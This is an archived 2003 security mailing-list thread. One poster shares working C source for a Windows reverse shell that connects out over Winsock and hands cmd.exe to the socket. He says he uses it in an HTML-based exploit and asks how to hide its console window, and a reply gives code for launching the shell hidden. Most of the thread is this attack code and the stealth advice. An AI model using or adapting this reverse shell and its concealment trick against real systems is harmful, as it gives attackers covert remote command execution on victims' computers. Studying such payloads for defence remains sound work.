Re: freeconsole()

From: sk (sk@scan-associates.net)
Date: Thu Feb 27 2003 - 18:50:12 PST

Next message: jesat_private: "Security contact for Bank Of America"

Previous message: Rory Savage: "Re: Non registering shell"
In reply to: Mike Mires: "freeconsole()"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

You may want to try:

si.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
FreeConsole();
CreateProcess(NULL,"cmd",NULL,NULL,1,NULL,NULL,NULL,&si,&pi);

To make sure the the newly created process starts with SW_HIDE.

sk
----- Original Message -----
From: "Mike Mires" <poc_sploitat_private>
To: <pentestat_private>
Cc: <vuln-devat_private>
Sent: Wednesday, February 26, 2003 6:25 PM
Subject: freeconsole()


> Hi all,
>
> I am using a basic reverse shell written in C as part of an html based
> exploit recently revealed by malware.com. it uses WSAStartup() and
> CreateProcess(). I'm looking for a way to hide the console created by
> CreateProcess. I've tried freeconsole() with no params as suggested by
some
> sources, however this does not work.
>
> Any ideas would be appreciated.
>
> Thanks
>
> P.S. code i'm using is
>
>
> #include <winsock2.h>
> #include <stdio.h>
> #include <windows.h>
> #pragma comment(lib,"ws2_32")
>
>
>
> void main(int argc, char *argv[])
> {
> // FreeConsole();
>
>
>         WSADATA wsaData;
>         SOCKET hSocket;
>         STARTUPINFO si;
>         PROCESS_INFORMATION pi;
>
>         struct sockaddr_in adik_sin;
>         memset(&adik_sin,0,sizeof(adik_sin));
>         memset(&si,0,sizeof(si));
>         WSAStartup(MAKEWORD(2,0),&wsaData);
>         hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
>         adik_sin.sin_family = AF_INET;
>         adik_sin.sin_port = htons(55);
>         adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1");
>         connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
>         si.cb = sizeof(si);
>         si.dwFlags = STARTF_USESTDHANDLES;
>         si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
>
>         CreateProcess(NULL,"cmd",NULL,NULL,1,NULL,NULL,NULL,&si,&pi);
>
>
>
> ExitProcess(0);
>
> }
>
>
> _________________________________________________________________
> Overloaded with spam? With MSN 8, you can filter it out
>
http://join.msn.com/?page=features/junkmail&pgmarket=en-gb&XAPID=32&DI=1059

Next message: jesat_private: "Security contact for Bank Of America"
Previous message: Rory Savage: "Re: Non registering shell"
In reply to: Mike Mires: "freeconsole()"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Feb 28 2003 - 08:30:11 PST